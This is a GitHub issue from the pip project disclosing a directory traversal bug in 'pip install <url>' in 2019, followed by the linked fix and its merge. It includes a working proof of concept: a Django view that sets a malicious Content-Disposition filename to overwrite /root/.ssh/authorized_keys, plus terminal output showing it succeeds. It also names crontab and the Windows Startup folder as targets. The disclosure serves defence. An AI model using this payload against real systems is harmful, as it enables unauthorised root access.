pip install <url> allow directory traversal, leading to arbitrary file write #6413

gzpan123 · 2019-04-16T17:23:55Z

Environment

pip version: pip 19.0.3
Python version: Python 2.7.15 / Python 2.7.15
OS: Ubuntu 16.04 / Windows 10

Description

This is a security vulnerability.

when installing a remote package via a specified URL "pip install <url>", A malicious server (or a network MitM if downloading over HTTP) can send a Content-Disposition header with filename which contains "../", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution.

issue occurs in _download_http_url in src/pip/_internal/download.py

poc:

for linux, pip usually requires root privileges, we can write following files to get root shell:
/root/.ssh/authorized_keys
/etc/crontab

for windows, we can write a batch file to the user startup dir, lead to command execution on next boot:
C:\Users<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

for malicious header:

from django.http import HttpResponse

def linux(request):
    response = HttpResponse("malicious public key\n")
    filename = "../../../../../root/.ssh/authorized_keys"
    response['Content-Type'] = 'RANDOM' # avoid mimetypes.guess_extension guess ext
    response['Content-Disposition'] = 'attachment;filename="{0}"'.format(filename)
    return response

pip install malicious url result:

root@DESKTOP-FRESH:~# pip install http://192.168.40.16/linux
Looking in indexes: https://mirrors.aliyun.com/pypi/simple/
Collecting http://192.168.40.16/linux
  Downloading http://192.168.40.16/linux
  Cannot unpack file /root/.ssh/authorized_keys (downloaded from /tmp/pip-req-build-UAVkjW, content-type: RANDOM); cannot detect archive format
Cannot determine archive format of /tmp/pip-req-build-UAVkjW
root@DESKTOP-FRESH:~# cat /root/.ssh/authorized_keys
malicious public key
root@DESKTOP-FRESH:~#

similar issue:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9686

The text was updated successfully, but these errors were encountered:

cjerdonek · 2019-06-09T18:35:02Z

@gzpan123 posted a PR for this here: #6418

FIX #6413 pip install <url> allow directory traversal

cjerdonek added C: download About fetching data from PyPI and other sources type: bug A confirmed bug or unintended behavior type: security Has potential security implications labels Apr 17, 2019

gzpan123 mentioned this issue Jun 9, 2019

FIX #6413 pip install <url> allow directory traversal #6418

Merged

cjerdonek pushed a commit to gzpan123/pip that referenced this issue Jun 11, 2019

FIX pypa#6413 pip install <url> allow directory traversal

a4c735b

cjerdonek closed this as completed in #6418 Jun 11, 2019

cjerdonek added a commit that referenced this issue Jun 11, 2019

Merge pull request #6418 from gzpan123/master

5776ddd

FIX #6413 pip install <url> allow directory traversal

lock bot added the auto-locked Outdated issues that have been locked by automation label Jul 11, 2019

lock bot locked as resolved and limited conversation to collaborators Jul 11, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

pip install <url> allow directory traversal, leading to arbitrary file write #6413

pip install <url> allow directory traversal, leading to arbitrary file write #6413

gzpan123 commented Apr 16, 2019

cjerdonek commented Jun 9, 2019

pip install <url> allow directory traversal, leading to arbitrary file write #6413

pip install <url> allow directory traversal, leading to arbitrary file write #6413

Comments

gzpan123 commented Apr 16, 2019

cjerdonek commented Jun 9, 2019